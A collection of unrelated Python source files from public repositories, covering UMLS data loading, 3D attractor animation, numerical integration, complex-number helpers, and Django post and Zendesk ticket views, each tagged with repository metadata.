delimiter="|",
names=col_names,
iterator=True,
# usecols=['cui','lang','sab','sdui','lui','sui','aui','saui','scui']
usecols=cols_to_use,
low_memory=False,
chunksize=10000,
)
)
else:
df = pd.read_csv(
os.path.join(self.umls_dir, "MRCONSO.RRF"),
delimiter="|",
names=col_names,
# usecols=['cui','lang','sab','sdui','lui','sui','aui','saui','scui']
usecols=cols_to_use,
low_memory=False,
# engine='pyarrow',
)
print("Load rankings")
rankings = pd.read_csv(
os.path.join(self.umls_dir, "MRRANK.RRF"),
delimiter="|",
names=["rank", "sab", "tty", "_", "_1"],
usecols=["rank", "sab", "tty"],
)
rankings["rank"] = -rankings["rank"] + 850
print("Merge rankings")
df = df.merge(rankings, on=["sab", "tty"])
self.umls = df
def _cache_umls(self):
"""
Cache processed UMLS dataframe for faster reloading
"""
if not self.debug and not self.using_cached:
cache_path = os.path.join(self.umls_dir, ".cached_df.feather")
print(f"Caching processed UMLS data to {cache_path}")
print(self.umls.index)
self.umls.reset_index(drop=True).to_feather(cache_path)
def get_canonical_name(
self,
ontologies_to_include: Union[str, list] = "all",
types_to_include: Union[str, list] = "all",
groups_to_include: Union[str, list] = "all",
use_umls_curies: bool = True,
mapping_cols: Optional[dict] = None,
prefixes: Optional[dict] = None,
remove_multigroup=False,
reverse=False,
lowercase=False,
):
"""
Get canonical name of entities in UMLS Metathesaurus
"""
df = self.filter_ontologies_and_types(
ontologies_to_include=ontologies_to_include,
types_to_include=types_to_include,
groups_to_include=groups_to_include,
remove_multigroup=remove_multigroup,
)
# Pick which set of CURIEs to use
if use_umls_curies:
df["identifier"] = df["cui"]
filtered = df[["identifier", "rank", "alias"]]
else:
subsets = []
for ontology in df.sab.unique():
mapping_col = ""
prefix = ""
if ontology in mapping_cols:
mapping_col = mapping_cols[ontology]
if ontology in prefixes:
prefix = prefixes[ontology]
subset = self._get_alias_single_subset(
df, ontology, mapping_col=mapping_col, prefix=prefix
)
subsets.append(subset[["identifier", "rank", "alias"]])
filtered = pd.concat(subsets).drop_duplicates()
if lowercase:
filtered["alias"] = filtered.alias.map(lambda x: x.lower())
filtered = filtered.drop_duplicates()
# Get output dict of CUI to Name mappings
output_dict = (
filtered.loc[filtered.groupby("identifier")["rank"].idxmin()]
.set_index("identifier")["alias"]
.to_dict()
)
return output_dict
def get_definition(
self,
ontologies_to_include: Union[str, list] = "all",
types_to_include: Union[str, list] = "all",
groups_to_include: Union[str, list] = "all",
use_umls_curies: bool = True,
mapping_cols: Optional[dict] = None,
prefixes: Optional[dict] = None,
remove_multigroup=False,
reverse=False,
lowercase=False,
):
"""
Get canonical name of entities in UMLS Metathesaurus
"""
print("Filtering by ontologies")
df = self.filter_ontologies_and_types(
ontologies_to_include=ontologies_to_include,
types_to_include=types_to_include,
groups_to_include=groups_to_include,
remove_multigroup=remove_multigroup,
)
print("Removing null definitions")
df = df.loc[~df['def'].isnull(),:]
# Pick which set of CURIEs to use
if use_umls_curies:
df["identifier"] = df["cui"]
filtered = df[["identifier", "rank", "def"]]
else:
subsets = []
for ontology in df.sab.unique():
mapping_col = ""
prefix = ""
if ontology in mapping_cols:
mapping_col = mapping_cols[ontology]
if ontology in prefixes:
prefix = prefixes[ontology]
subset = self._get_alias_single_subset(
df, ontology, mapping_col=mapping_col, prefix=prefix
)
subsets.append(subset[["identifier", "rank", "def"]])
filtered = pd.concat(subsets).drop_duplicates()
if lowercase:
filtered["def"] = filtered['def'].map(lambda x: x.lower())
filtered = filtered.drop_duplicates()
# Get output dict of CUI to Name mappings
output_dict = (
filtered.loc[filtered.groupby("identifier")["rank"].idxmin()]
.set_index("identifier")["def"]
.to_dict()
)
return output_dict
def get_types_and_groups(
self,
ontologies_to_include: Union[str, list] = "all",
types_to_include: Union[str, list] = "all",
groups_to_include: Union[str, list] = "all",
use_umls_curies: bool = True,
mapping_cols: Optional[dict] = None,
prefixes: Optional[dict] = None,
remove_multigroup=False,
reverse=False,
lowercase=False,
):
df = self.filter_ontologies_and_types(
ontologies_to_include=ontologies_to_include,
types_to_include=types_to_include,
groups_to_include=groups_to_include,
remove_multigroup=remove_multigroup,
)
# Pick which set of CURIEs to use
if use_umls_curies:
df["identifier"] = df["cui"]
filtered = df[["identifier", "rank", "tui", "group"]]
else:
subsets = []
for ontology in df.sab.unique():
mapping_col = ""
prefix = ""
if ontology in mapping_cols:
mapping_col = mapping_cols[ontology]
if ontology in prefixes:
prefix = prefixes[ontology]
subset = self._get_alias_single_subset(
df, ontology, mapping_col=mapping_col, prefix=prefix
)
subsets.append(subset[["identifier", "rank", "tui", "group"]])
filtered = pd.concat(subsets)
grouped = filtered.groupby('identifier')
id2types = grouped.tui.first().to_dict()
id2groups = grouped.group.first().to_dict()
return id2types, id2groups
def get_mapping(
self,
ontology_abbreviation="MSH",
reverse=False,
mapping_col="sdui",
umls_prefix="",
other_prefix="",
):
"""
Get cross-references between UMLS and another ongology
"""
# Load main UMLS file (MRCONSO.RRF)
# Filter down to desired ontology
filtered = (
self.umls.query("sab == @ontology_abbreviation")
.loc[:, ["cui", mapping_col]]
.dropna()
.drop_duplicates()
.reset_index(drop=True)
)
if umls_prefix != "":
filtered["cui"] = filtered["cui"].map(lambda x: umls_prefix + ":" + x)
if other_prefix != "":
filtered[mapping_col] = filtered[mapping_col].map(
lambda x: other_prefix + ":" + x
)
if reverse:
output = filtered.set_index(mapping_col).to_dict()["cui"]
else:
output = filtered.set_index("cui").to_dict()[mapping_col]
return output
def interalias_mapping(self, type_subset="gngm"):
"""
Get mapping between all terms with the same alias
"""
pass
# if hasattr(self.cui2type):
def _load_types(self):
"""
Load mapping from CUI to UMLS semantic type
"""
# Load type dataframe
print("Loading semantic types")
cui_type_df = pd.read_csv(
os.path.join(self.umls_dir, "MRSTY.RRF"),
usecols=[0, 1],
names=["cui", "tui"],
delimiter="|",
# engine='pyarrow'
)
self._load_type_abbrevs()
cui_type_df["group"] = cui_type_df["tui"].map(self.tui2group)
grouped = cui_type_df.groupby("cui")
# Get mapping from CUI to types
print("Mapping CUIs to types")
self.cui2types = grouped["tui"].progress_apply(list).to_dict()
# Get mapping from CUI to groups
print("Mapping CUIs to groups")
self.cui2groups = (
grouped["group"].progress_apply(lambda x: list(set(x))).to_dict()
)
def _load_type_abbrevs(self):
"""
Get type abbreviations and semantic groups
"""
# Map each TUI to a semantic group
self.tui2group = (
pd.read_csv(
os.path.join(self.umls_dir, "SemGroups.txt"),
sep="|",
usecols=[0, 2],
names=["group", "tui"],
)
.set_index("tui")
.to_dict()["group"]
)
self.semantic_groups = list(set(self.tui2group.values()))
# Mape each TUI to its abbreviaion/name
# Semantic network abbreviations
sem_network_cols = [
"row_type",
"tui",
"name",
"tree_index",
"desc",
"_1",
"clarification",
"_2",
"abbrev",
"inverse_relation",
"_3",
]
self.tui_type_abbreviations = pd.read_csv(
os.path.join(self.umls_dir, "semantic_network/SRDEF"),
sep="|",
names=sem_network_cols,
usecols=["row_type", "tui", "name", "desc", "abbrev"],
)
self.type2abbrev = (
self.tui_type_abbreviations[["tui", "abbrev"]]
.set_index("tui")
.to_dict()["abbrev"]
)
def _merge_types(self):
"""
Merge type information into UMLS dataframe
"""
print("Adding type information to UMLS dataframe")
self.umls["tui"] = self.umls["cui"].map(self.cui2types)
print("Adding semantic group informaiton to UMLS dataframe")
self.umls["group"] = self.umls["cui"].map(self.cui2groups)
def _load_type2name(self, umls_dir):
"""
Load mapping from semantic types to names/abbreviations
"""
pass
def _get_alias_single_subset(self, df, ontology, mapping_col="", prefix=""):
"""
Get CURIE -> alias mapping for a single subset of UMLS
"""
filtered = df.query("sab == @ontology")
inds = filtered.loc[:, [mapping_col, "alias"]].dropna().drop_duplicates().index
filtered = filtered.loc[inds, :].reset_index(drop=True)
filtered["identifier"] = filtered[mapping_col].map(lambda x: prefix + ":" + x)
return filtered
def list_groups(self):
"""
List available semantic groups
"""
return self.semantic_groups
def filter_ontologies_and_types(
self,
ontologies_to_include: Union[str, list] = "all",
types_to_include: Union[str, list] = "all",
groups_to_include: Union[str, list] = "all",
remove_multigroup=False,
):
# Pull correct subset of UMLS, if subsetting at all
# print(self.umls.columns)
if ontologies_to_include == "all":
df = self.umls.query('lang == "ENG"')
elif type(ontologies_to_include) == str:
df = self.umls.query('sab == @ontologies_to_include & lang == "ENG"')
else:
df = self.umls[self.umls.sab.isin(ontologies_to_include)].query(
'lang == "ENG"'
)
# Remove concepts with more than one group
if remove_multigroup:
df = df[df["group"].map(lambda x: len(x) == 1)]
# Filter by semantic group
if type(groups_to_include) == str:
if groups_to_include != "all":
raise ValueError('groups_to_include must be a list of strings or "all"')
elif type(groups_to_include) == list:
mask = df["group"].map(lambda x: any([y in groups_to_include for y in x]))
df = df[mask]
else:
raise TypeError("groups_to_include must be list or string")
# Filter by semantic type
if type(types_to_include) == str:
if types_to_include != "all":
raise ValueError('types_to_include must be a list of strings or "all"')
elif type(types_to_include) == list:
mask = df["tui"].map(lambda x: any([y in types_to_include for y in x]))
df = df[mask]
else:
raise TypeError("types_to_include must be list or string")
return df
def get_types(
self,
ontologies_to_include: Union[str, list] = "all",
types_to_include: Union[str, list] = "all",
groups_to_include: Union[str, list] = "all",
remove_multigroup=False,
):
"""
Get semantic types for UMLS entities
"""
df = self.filter_ontologies_and_types(
ontologies_to_include=ontologies_to_include,
types_to_include=types_to_include,
groups_to_include=groups_to_include,
remove_multigroup=remove_multigroup,
)
return df.groupby("cui").tui.first().to_dict()
def get_aliases(
self,
ontologies_to_include: Union[str, list] = "all",
types_to_include: Union[str, list] = "all",
groups_to_include: Union[str, list] = "all",
use_umls_curies: bool = True,
mapping_cols: Optional[dict] = None,
prefixes: Optional[dict] = None,
remove_multigroup=False,
reverse: bool = False,
lowercase: bool = False,
):
"""
Get mapping of CURIE -> aliases for all or a subset of UMLS entities
Parameters:
-----------------------------
ontologies_to_include:
Ontologies in UMLS to include in subset, default 'all'
types_to_include:
Semantic types to include in subset, default 'all'
groups_to_include:
Semantic groups to include in subset, default: 'all'
Semantic groups are more general than types and typicially
include multiple types.
use_umls_curies: bool, default True
Whether to use UMLS CUIs as unique identifiers.
If false, use CUIs subset ontologies.
mapping_cols:
Dict of which column to use for CURIEs for each ontology. If none
specified, sdui is used.
prefixes:
Dict of prefixes to use for each ontology. If none given, no prefixes
are used
reverse: bool, default False
If true, return mapping from aliases to CURIEs instead of vice versa
lowercase: bool, default False
If true, lowercase all aliases before deduplicating/returning
remove_multigroup: bool, default True
If true, remove entities that belong to multiple groups
"""
df = self.filter_ontologies_and_types(
ontologies_to_include=ontologies_to_include,
types_to_include=types_to_include,
groups_to_include=groups_to_include,
remove_multigroup=remove_multigroup,
)
# Pick which set of CURIEs to use
if use_umls_curies:
filtered = (
df.loc[:, ["cui", "alias"]]
.dropna()
.drop_duplicates()
.reset_index(drop=True)
).rename({"cui": "identifier"}, axis=1)
else:
subsets = []
for ontology in df.sab.unique():
mapping_col = ""
prefix = ""
if ontology in mapping_cols:
mapping_col = mapping_cols[ontology]
if ontology in prefixes:
prefix = prefixes[ontology]
subset = self._get_alias_single_subset(
df, ontology, mapping_col=mapping_col, prefix=prefix
)
subsets.append(subset[["identifier", "alias"]])
filtered = pd.concat(subsets).drop_duplicates()
if lowercase:
filtered["alias"] = filtered.alias.map(lambda x: x.lower())
filtered = filtered.drop_duplicates()
if reverse:
return filtered.groupby("alias")["identifier"].apply(list).to_dict()
else:
return filtered.groupby("identifier")["alias"].apply(list).to_dict()
def get_synsets(self, preferred_type="gngm"):
"""
Get mapping between all terms with the same alias
This is mostly to get mapping from proteins to their corresponding gene and vice-versa
"""
df = self.umls
df["type"] = df.tui.map(self.type2abbrev)
df["has_preferred_type"] = df["type"] == preferred_type
grouped = self.umls.groupby("alias")
# Semantic network abbreviations
# def get_semantic_type_hierarchy(umls_dir, tui):
# sem_network_cols = [
# "row_type",
# "tui",
# "name",
# "tree_index",
# "desc",
# "_1",
# "clarification",
# "_2",
# "abbrev",
# "inverse_relation",
# "_3",
# ]
# semantic_network = pd.read_csv(
# os.path.join(umls_dir, "semantic_network/SRDEF"),
# sep="|",
# names=sem_network_cols,
# usecols=["row_type", "tui", "name", "tree_index"],
# )
# tree_index_to_name = semantic_network.set_index('tree_index')['name'].to_dict()
# def read_sem_group():
# pass
# def download_umls():
# pass
| davidkartchner/biomedical-entity-linking | umls_utils.py | umls_utils.py | py | 22,206 | python | en | code | 2 | github-code | 13 |
33387389833 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from random import shuffle
import matplotlib
import matplotlib.pyplot as plt
import mpl_toolkits.mplot3d.axes3d as p3 # noqa: F401
import numpy as np
from matplotlib import animation
from more_itertools import peekable
from mpl_toolkits.mplot3d.art3d import Line3DCollection
from attractors import data
from attractors.utils.base import ATTRACTOR_PARAMS
from attractors.utils.colortable import get_continuous_cmap
from attractors.utils.des import DES
from attractors.utils.video import ffmpeg_video
try:
import importlib.resources as pkg_resources
except ImportError:
import importlib_resources as pkg_resources
# * load theme
raw_themes_data = pkg_resources.open_text(data, "themes.json")
themes = json.load(raw_themes_data)
class Attractor(DES):
bgcolor = None
palette = None
fig, ax = None, None
_update_func = None
_points = None
_init_func = None
def __init__(self, attractor, **kwargs):
self.attr = ATTRACTOR_PARAMS[attractor]
self.init_coord = kwargs.get("init_coord", self.attr["init_coord"])
self.params = {
self.attr["params"][i]: kwargs.get(
self.attr["params"][i], self.attr["default_params"][i]
)
for i in range(len(self.attr["params"]))
}
super(Attractor, self).__init__(attractor, self.init_coord, self.params)
def __eq__(self, other):
if not isinstance(other, Attractor):
return NotImplemented
return self.attractor == other.attractor
@staticmethod
def list_themes():
return themes
@staticmethod
def list_des():
des_methods = set(dir(DES.__mro__[0])) - set(dir(DES.__mro__[1]))
return [x for x in des_methods if not x.startswith("_")]
@staticmethod
def list_attractors():
return list(ATTRACTOR_PARAMS.keys())
@staticmethod
def list_params(attr):
return ATTRACTOR_PARAMS[attr]["params"]
@classmethod
def set_theme(cls, theme, bgcolor, palette):
if all(v is None for v in [theme, bgcolor, palette]):
cls.bgcolor = "#000000"
cls.palette = "jet"
elif all(v is None for v in [bgcolor, palette]) and theme is not None:
palette_temp = list(theme.values())
palette_temp.remove(theme["background"])
palette_temp.insert(0, palette_temp.pop(-1))
shuffle(palette_temp)
cls.bgcolor = theme["background"]
cls.palette = palette_temp
else:
if bgcolor is not None:
cls.bgcolor = bgcolor
if palette is not None:
cls.palette = palette
@classmethod
def set_figure(cls, width, height, dpi):
cls.fig = plt.figure(figsize=(width, height), dpi=dpi)
cls.ax = cls.fig.add_axes([0, 0, 1, 1], projection="3d")
cls.ax.axis("off")
cls.fig.set_facecolor(cls.bgcolor)
cls.ax.set_facecolor(cls.bgcolor)
if isinstance(cls.palette, str):
cls.cmap = plt.cm.get_cmap(cls.palette)
else:
cls.cmap = get_continuous_cmap(cls.palette)
@classmethod
def set_limits(cls, xlim, ylim, zlim):
cls.ax.set_xlim(xlim)
cls.ax.set_ylim(ylim)
cls.ax.set_zlim(zlim)
@classmethod
def _wrap_set(cls, objs, kwargs):
assert all(
x.peek().attractor == objs[0].peek().attractor for x in objs
), "All objects must be of the same attractor type"
try:
theme = themes[kwargs.get("theme")]
except KeyError:
theme = None
Attractor.set_theme(
theme,
bgcolor=kwargs.get("bgcolor", None),
palette=kwargs.get("palette", None),
)
Attractor.set_figure(
width=kwargs.get("width", 16),
height=kwargs.get("width", 9),
dpi=kwargs.get("dpi", 120),
)
attr = ATTRACTOR_PARAMS[objs[0].peek().attractor]
Attractor.set_limits(
xlim=kwargs.get("xlim", attr["xlim"]),
ylim=kwargs.get("ylim", attr["ylim"]),
zlim=kwargs.get("zlim", attr["zlim"]),
)
@classmethod
def set_animate_multipoint(cls, *objs, **kwargs):
objs = [peekable(obj) for obj in objs]
Attractor._wrap_set(objs, kwargs)
colors = cls.cmap(np.linspace(0, 1, len(objs)))
linekwargs = kwargs.get("linekwargs", {})
pointkwargs = kwargs.get("pointkwargs", {})
lines = sum(
[
cls.ax.plot([], [], [], "-", c=c, antialiased=True, **linekwargs)
for c in colors
],
[],
)
pts = sum(
[cls.ax.plot([], [], [], "o", c=c, **pointkwargs) for c in colors], []
)
def init():
for line, pt in zip(lines, pts):
line.set_data_3d([], [], [])
pt.set_data_3d([], [], [])
return lines + pts
maxlen = len(max([obj.peek() for obj in objs], key=len))
def update(i):
for line, pt, k in zip(lines, pts, objs):
s = next(k, None)
if not s:
continue
if i == maxlen - 1:
plt.close(
line.axes.figure
) # Manually closing figure after all attractors have been animated
line.set_data_3d(
np.hstack(
(
np.array(line.get_data_3d()),
np.atleast_2d(np.array([s.X, s.Y, s.Z])).T,
)
)
)
pt.set_data_3d(s.X, s.Y, s.Z)
cls.ax.view_init(
kwargs.get("elevationrate", 0.005) * i,
kwargs.get("azimuthrate", 0.05) * i,
)
return lines + pts
cls._update_func = update
cls._init_func = init
cls._points = maxlen
return cls
@classmethod
def set_animate_gradient(cls, obj, **kwargs):
obj = peekable(obj)
Attractor._wrap_set([obj], kwargs)
# Find a way to skip these steps? (need the full list for color array)
objlist = []
for s in obj:
objlist.append([s.X, s.Y, s.Z])
objlist = np.array(objlist)
linekwargs = kwargs.get("linekwargs", {})
pointkwargs = kwargs.get("pointkwargs", {})
line = Line3DCollection([], cmap=cls.cmap, **linekwargs)
cls.ax.add_collection3d(line)
val = {"X": 0, "Y": 1, "Z": 2}
colorarray = objlist[:, val[kwargs.get("gradientaxis", "Z")]]
(pt,) = cls.ax.plot([], [], [], "o", **pointkwargs)
line.set_array(np.array(colorarray))
colors = line.to_rgba(colorarray)
del colorarray
def init():
line.set_segments([])
pt.set_data_3d([], [], [])
return line, pt
def update(i):
pts = np.array(objlist[:i]).reshape(-1, 1, 3)
segs = np.concatenate([pts[:-1], pts[1:]], axis=1)
line.set_segments(segs)
pt.set_data_3d([objlist[i, 0]], [objlist[i, 1]], [objlist[i, 2]])
pt.set_color(colors[i])
cls.ax.view_init(
kwargs.get("elevationrate", 0.005) * i,
kwargs.get("azimuthrate", 0.05) * i,
)
return line, pt
points = len(objlist)
cls._update_func = update
cls._init_func = init
cls._points = points
return cls
@classmethod
def animate(cls, **kwargs):
if kwargs.get("live", False):
anim = animation.FuncAnimation(
cls.fig,
cls._update_func,
init_func=cls._init_func,
interval=1000 / kwargs.get("fps", 60),
blit=False,
)
if kwargs.get("show", True):
plt.show()
else:
return anim
else:
matplotlib.use("Agg")
ffmpeg_video(
cls.fig,
cls._update_func,
cls._points,
kwargs.get("fps", 60),
kwargs.get("outf", "output.mp4"),
)
@classmethod
def plot_gradient(cls, index, obj, **kwargs):
obj = peekable(obj)
Attractor._wrap_set([obj], kwargs)
objlist = [[s.X, s.Y, s.Z] for s in obj]
objlist = np.array(objlist)
linekwargs = kwargs.get("linekwargs", {})
pointkwargs = kwargs.get("pointkwargs", {})
line = Line3DCollection([], cmap=cls.cmap, **linekwargs)
cls.ax.add_collection3d(line)
val = {"X": 0, "Y": 1, "Z": 2}
colorarray = objlist[:, val[kwargs.get("gradientaxis", "Z")]]
(pt,) = cls.ax.plot([], [], [], "o", **pointkwargs)
line.set_array(np.array(colorarray))
colors = line.to_rgba(colorarray)
pts = np.array(objlist[:index]).reshape(-1, 1, 3)
segs = np.concatenate([pts[:-1], pts[1:]], axis=1)
line.set_segments(segs)
pt.set_data_3d([objlist[index, 0]], [objlist[index, 1]], [objlist[index, 2]])
pt.set_color(colors[index])
cls.fig.canvas.draw()
return cls.ax
@classmethod
def plot_multipoint(cls, index, *objs, **kwargs):
objs = [peekable(obj) for obj in objs]
Attractor._wrap_set(objs, kwargs)
colors = cls.cmap(np.linspace(0, 1, len(objs)))
linekwargs = kwargs.get("linekwargs", {})
pointkwargs = kwargs.get("pointkwargs", {})
lines = sum(
(
cls.ax.plot([], [], [], "-", c=c, antialiased=True, **linekwargs)
for c in colors
),
[],
)
pts = sum(
(cls.ax.plot([], [], [], "o", c=c, **pointkwargs) for c in colors), []
)
for line, pt, k in zip(lines, pts, objs):
tx, ty, tz = [], [], []
for s in k:
if s.ts == index:
break
tx += [s.X]
ty += [s.Y]
tz += [s.Z]
line.set_data_3d(tx, ty, tz)
pt.set_data_3d(s.X, s.Y, s.Z)
cls.fig.canvas.draw()
return cls.ax
| simrit1/attractors | attractors/attractor.py | attractor.py | py | 10,423 | python | en | code | 0 | github-code | 13 |
41032947993 | alphabet = 'QWERTYUIOPASDFGHJKLZXCVBNM'
fin = open('sr-sample-input.txt')
fout = open('output.txt', 'w')
lines = [(i[:-1] if i[-1]=='\n' else i) for i in fin.readlines()]
lines = [''.join(['' if c.capitalize() not in alphabet else c.capitalize() for c in i]) for i in lines]
def ADF(a, b):
maxlen, maxpos = -1, (0, 0)
if (len(a)*len(b) == 0): return 0
for sublen in range(1, min(len(a),len(b))+1):
for i in range(len(a)-sublen+1):
for j in range(len(b)-sublen+1):
if a[i:i+sublen] == b[j:j+sublen]:
if sublen == maxlen:
if a[i:i+sublen]<a[maxpos[0]:maxpos[0]+maxlen]:
maxpos = (i, j)
else:
maxlen = sublen
maxpos = (i, j)
if maxlen<0: return 0
return maxlen + ADF(a[0:maxpos[0]],b[0:maxpos[1]]) + ADF(a[maxpos[0]+maxlen:],b[maxpos[1]+maxlen:])
for i in range(5):
str1, str2 = lines[i*2], lines[i*2+1]
print(ADF(str1,str2), file=fout)
fin.close()
fout.close()
| u8y7541/acsl | 2020senior2/2020senior2.py | 2020senior2.py | py | 913 | python | en | code | 0 | github-code | 13 |
74527289938 | # -*- coding: utf-8 -*-
"""
Created on Thu Jan 9 16:03:15 2020
@author: Hugo
"""
import math
f = lambda x: (1 +(2.5*math.e**(2.5*x))**2 )**(1/2)
g = lambda x: math.sqrt(1 + pow(2.5 * pow(math.e, 2.5 * x), 2))
def trapezios(f,a,b,h):
n = int((b-a)/h)
St = f(a) + f(b)
for i in range (1,n):
# print(St)
St += 2 * f(a + i*h)
return St * h/2
def simpson(f,a,b,h):
n = int((b-a)/h)
Ss = f(a) + f(b)
for i in range(1,n):
if(i % 2 == 0):
Ss += 2 * f(a + i*h)
else:
Ss += 4 * f(a + i*h)
return Ss * h/3
a = 0
b = 1
h = 0.125
St = trapezios(f,a,b,h)
St1 = trapezios(f,a,b,h/2)
St2 = trapezios(f,a,b,h/4)
Qct = (St1-St)/(St2-St1)
Et = (St2-St1)/3
Ss = simpson(f,a,b,h)
Ss1 = simpson(f,a,b,h/2)
Ss2 = simpson(f,a,b,h/4)
Qcs = (Ss1-Ss)/(Ss2-Ss1)
Es = (Ss2-Ss1)/15
print(h,h)
print(h/2,h/2)
print(h/4,h/4)
print(St,Ss)
print(St1,Ss1)
print(St2,Ss2)
print(Qct,Qcs)
print(Et,Es)
| Hugomguima/FEUP | 1st_Year/1st_Semestre/Mnum/Exame/Exame 2017/Pergunta2.py | Pergunta2.py | py | 1,016 | python | en | code | 0 | github-code | 13 |
40927887543 | import pandas as pd
from lib.exp.summary import Summary
from lib.exp.evaluator.preproc_evaluator import PreprocEvaluator
from lib.exp.pre import Const
from lib.exp.pre import Reducer
from lib.exp.evaluator.accuracy import Accuracy
class _Exts(object):
def __init__(self):
pass
def __slide_count(self):
self._reload_obj("summary")
return self.su_.info(self.root, self.name).n_slides
def _reload_obj(self, obj_name):
if obj_name == "reducer":
self.re_ = Reducer(self.root, self.name)
elif obj_name == "preproc":
self.pp_ = PreprocEvaluator(self.root, self.name)
elif obj_name == "summary":
self.su_ = Summary()
def __find_dof(self, key):
dk = Const.Rkeys == key
di = Const.Doffsets[dk]
return di
def _get_reduced_data(self, rk, dof):
self._reload_obj("reducer")
prk = "/nr/{}".format(rk)
rdf = self.re_.load(prk)
rdf.frame_id = rdf.frame_id - dof
return rdf
def _get_reduced_slides(self, rk, doffset=0):
rdf = self._get_reduced_data(rk, doffset)
self._reload_obj("preproc")
sdf = self.pp_.ac_reduced_to_slides(rdf)
return sdf
def _get_reduced_segments(self, rk):
dof = self.__find_dof(rk)
rdf = self._get_reduced_data(rk, dof)
self._reload_obj("preproc")
sdf = self.pp_.ac_segments_df(rdf)
return sdf
def _get_slide_coverages(self, keys):
"""
Load slide coverage and slide hitratio data
"""
self._reload_obj("reducer")
self._reload_obj("preproc")
pda = []
for ri, na, rk, dof in self.re_.zipkey(keys):
prk = "/nr/{}".format(rk)
red = self.re_.load(prk)
red.frame_id = red.frame_id - dof
pdc = self.pp_.preview(red, self.__slide_count())
pdc.update(method=na)
pda.append(pdc)
return pd.DataFrame(pda)
def _get_accuracy(self):
aa = Accuracy()
aa.set_data(self.root, self.name, aa.PreprocessSegmentHitRatio)
req = ["accuracy", "precision", "sensitivity"]
return aa.details(req, show=0)
def _get_batch_delays(self, keys=[]):
self._reload_obj("reducer")
dis = []
for ri, na, rk, dof in self.re_.zipkey(keys):
df = self._get_reduced_slides(rk, dof)
dis.append(dict(key=na, df=df))
return dis
| speed-of-light/pyslider | lib/plotter/pre/exts.py | exts.py | py | 2,479 | python | en | code | 2 | github-code | 13 |
74287985616 | import math
def sumacomplex(c1,c2):
real=c1[0]+c2[0]
img=c1[1]+c2[1]
resultado=(real,img)
return resultado
def multcomplex(c1,c2):
real=((c1[0]*c2[0])-(c1[1]*c2[1]))
img=(c1[0]*c2[1])+(c1[1]*c2[0])
resultado=(real,img)
return resultado
def restacomplex(c1,c2):
real=c1[0]-c2[0]
img=c1[1]-c2[1]
resultado=(real,img)
return resultado
def divcomplex(c1,c2):
c3=(c2[0],-c2[1])
realnum=(c1[0]*c3[0])-(c1[1]*c3[1])
imgnum=(c1[0]*c3[1])+(c1[1]*c3[0])
realdenom=(c2[0]*c3[0])-(c2[1]*c3[1])
resultadodiv=(realnum,imgnum,realdenom)
return resultadodiv
def modulocomplex(c):
modu=round((c[0]**2+c[1]**2)**(0.5),6)
return modu
def conjugadocomplex(c):
return (c[0],-c[1])
def fasecomplex(c):
if(c[0]!=0):
fase=math.degrees(math.atan((c[1])/(c[0])))
if(c[0]<0 and c[1]>0):
fase+=180
if(c[0]<0 and c[1]<0):
fase-=180
fase=round(fase,6)
else:
if(c[1]==0):
fase=0
elif(c[1]>0):
fase=90
elif(c[1]<0):
fase=270
return fase
def polarcomplex(c):
modu=modulocomplex(c)
fase=fasecomplex(c)
resultado=(modu,fase)
return resultado
def printpolarcomplex(modu,fase):
print(f'{modu} ({fase}°)')
def printcomplex(c):
print("{} + {}i".format(c[0],c[1]))
def printdivcomplex(c):
print(f"({c[0]} / {c[2]}) + ({c[1]} / {c[2]}) i")
if __name__ == '__main__':
printcomplex((7,-4))
printcomplex(sumacomplex((3,-8),(4,6)))
printcomplex(multcomplex((2,-3),(-1,1)))
printcomplex(restacomplex((1,-1),(-2,-5)))
print(modulocomplex((-2,-3)))
printdivcomplex(divcomplex((3,2),(-1,2)))
print(conjugadocomplex((7,-4)))
fase=fasecomplex((7,-4))
print(f'{fase}°')
print(polarcomplex((7,-4))) | Cristian5124/LibComplex | Libcomplex.py | Libcomplex.py | py | 1,916 | python | en | code | 1 | github-code | 13 |
7117420029 | """Adapted from clucker project"""
"""Post creation views."""
from django.contrib.auth.mixins import LoginRequiredMixin
from django.shortcuts import redirect, render
from django.views.generic.edit import CreateView
from django.urls import reverse
from bookclub.forms import UserPostForm
from bookclub.models import UserPost, Club, User
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from django.views.generic.edit import View
from django.core.paginator import Paginator
from django.conf import settings
class UserNewPostView(LoginRequiredMixin, CreateView):
"""Class-based generic view for new post handling."""
model = UserPost
template_name = 'user_feed.html'
form_class = UserPostForm
http_method_names = ['post']
context_object_name = 'user'
pk_url_kwarg = 'user_id'
def get_context_data(self, **kwargs):
"""Return context data, including new post form."""
user_id = self.kwargs['user_id']
user = User.objects.get(id=user_id)
user_posts = UserPost.objects.filter(author = user)
context = super().get_context_data(**kwargs)
context['user'] = user_id
context['form'] = UserPostForm()
context['posts'] = user_posts
return context
def form_valid(self, form, **kwargs):
"""Process a valid form."""
user_id = self.kwargs['user_id']
user = User.objects.get(id=user_id)
form.instance.author = user
return super().form_valid(form)
def get_success_url(self, **kwargs):
"""Return URL to redirect the user too after valid form handling."""
messages.add_message(self.request, messages.SUCCESS, "The post was sent!")
user = self.kwargs['user_id']
return reverse('profile')
def handle_no_permission(self):
return redirect('login')
def get_all_follow_posts(request):
all_follow_posts = []
current_user = request.user
for follow in current_user.followees.all():
user_posts = list(set(UserPost.objects.filter(author=follow)))
if user_posts:
for post in user_posts:
all_follow_posts.append(post)
all_follow_posts.sort(key=lambda p: p.created_at, reverse=True)
return all_follow_posts
class UserPostsView(LoginRequiredMixin, View):
"""View that handles user posts."""
def get(self, request):
"""Display user post template"""
return self.render()
def render(self):
current_user = self.request.user
"""Render all user posts"""
user_posts = get_all_follow_posts(self.request)
paginator = Paginator(user_posts, settings.POSTS_PER_PAGE)
page_number = self.request.GET.get('page')
page_obj = paginator.get_page(page_number)
return render(self.request, 'user_posts.html', {'user_posts': user_posts, 'page_obj': page_obj})
| EmmaSConteh/Ctrl_Intelligence | bookclub/views/user_post_views.py | user_post_views.py | py | 2,906 | python | en | code | 0 | github-code | 13 |
6709691245 | from django.shortcuts import render
from ticket.Zenpy import zenpy_client
from django.shortcuts import redirect
from user.forms import CreateTicket
from zenpy.lib.api_objects import Ticket, User,CustomField
from django.contrib import messages
# CREATE
def create_ticket(request):
form = CreateTicket(request.POST)
if request.method == "POST":
if form.is_valid():
print('valid')
Email = form.cleaned_data['email']
Phone = form.cleaned_data['Phone_Number']
Description = form.cleaned_data['description']
Subject = form.cleaned_data['subject']
Priority = form.cleaned_data['priority']
"""
Zendesk create ticket API call .."""
zenpy_client.tickets.create(
